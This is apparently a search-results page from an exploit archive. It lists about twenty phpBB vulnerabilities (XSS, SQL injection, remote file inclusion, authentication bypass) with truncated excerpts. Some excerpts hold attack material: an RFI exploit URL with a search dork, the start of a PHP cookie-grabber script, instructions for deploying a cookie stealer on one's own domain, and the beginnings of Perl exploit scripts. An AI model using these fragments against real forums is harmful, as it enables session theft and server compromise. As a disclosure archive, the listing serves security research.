2176 matches found
PHPBB 2.0.x Viewtopic.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13345/info phpBB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script...
phpBB User Viewed Posts Tracker <= 1.0 File Include Vulnerability
No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= phpBB User Viewed Posts Tracker Version = 1.0 phpbbrootpath File Include Vulnerability...
PHPBB 2.0.x album_portal.php Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/10177/info It has been reported that phpBB may be prone to a file include vulnerability that may allow remote attackers to include a remote malicious script to be executed on a vulnerable system...
phpBB Prillian French Mod <= 0.8.0 - Remote File Include Exploit
No description provided by source. !/usr/bin/perl PhpBB Prillian French Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high...
Advanced GuestBook <= 2.4.0 (phpBB) Remote File Inclusion Exploit
No description provided by source...
phpBB 2.0.3 Script Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/6248/info phpBB does not properly sanitize user input in forum postings. This could allow a malicious user to inject script code into a forum post which would in turn be executed when the page is viewed by other users...
PHPBB-Auction Module 1.0/1.2 Auction_Rating.PHP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13283/info phpbb-auction module is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitati...
PHPBB Remote Mod.PHP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13209/info A remote SQL injection vulnerability affects the datenbank module for phpbb. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. An...
phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code)
No description provided by source. / Paisterist's code was nice but heres mil's version. precompiled: http://www.milw0rm.com/sploits/897.rar Usage: bcc32 897.cpp and place the exe in your firefox profile dir. Usually C:\Documents and Settings\Application...
Notes Module for PHPBB SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13417/info The notes module for phpBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful...
Advanced GuestBook <= 2.4.0 (phpBB) File Inclusion Vulnerability
No description provided by source. Title: Advanced GuestBook for phpBB = 2.4.0 Remote File Inclusion Dork: inurl:guestbook.php Advanced GuestBook powered by phpbb Credits: Oo Exploit: http://url/phpbbpath/admin/addentry.php?phpbbrootpath=http://badscript? milw0rm.com 2006-04-28...
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
No description provided by source. to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103 Make sure you change www.milw0rm.com to your domain. thnx. /str0ke Author: threesixthousan / As long as html is ON in the latest version of phpBB forums, several XSS attack vector...
phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Include Exploit
No description provided by source. !/usr/bin/perl phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit Coded by bd0rk || SOH-Crew Usage: exploit.pl target cmd shell shell variable Greetings: str0ke, TheJT, Kacper, Lu7k, Maik Vulnerable Code: includeonce$phpbbrootpath...
PHPBB 1.x/2.0.x Knowledge Base Module KB.PHP SQL Injection Vulnerability
No description provided by source...
Dimension of phpBB <= 0.2.6 (phpbb_root_path) Remote File Includes
No description provided by source. / \ \ \ ,, / / '-./.-' .--' '--. / / /\ \ \ SpiderZ Hacking Security | | | | \ \ / / '..' Author: SpiderZ Dimension of phpBB Remote File Inclusion Vulnerability For: Dimension of phpBB 0.2.5 phpBB 2.0.21 Site: www.spiderz.altervista.org Site02:...
phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2)
No description provided by source. phpBB 2.0.12 Session Handling Authentication Bypass .. easy to use exploit .. YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM.. 1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made : 3- Close the Browser .. 2- Open the cookies.t...
Foing <= 0.7.0 (phpBB) Remote File Inclusion Vulnerability
No description provided by source. Kurdish Security Advisory Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html Foing Remote File Include Vulnerability PHPBB : Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz . Abdullah...
phpBB 2.0.x Viewtopic.PHP PHP Script Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/10701/info The 'viewtopic.php' phpBB script is prone to a remote PHP script injection vulnerability because the application fails to properly sanitize user-supplied URI parameters before using them to construct dynamicall...
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)
No description provided by source. // Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/ ?php $cookie = $GET'c'; $ip = getenv 'REMOTEADDR'; $date=datej F, Y, g:i a; $referer=getenv 'HTTPREFERER'; $fp = fopen'cookies.txt', 'a'; fwrite$fp, 'Cookie: '.$cookie.'br IP: '...
phpBB <= 2.0.15 Register Multiple Users Denial of Service (c code)
No description provided by source...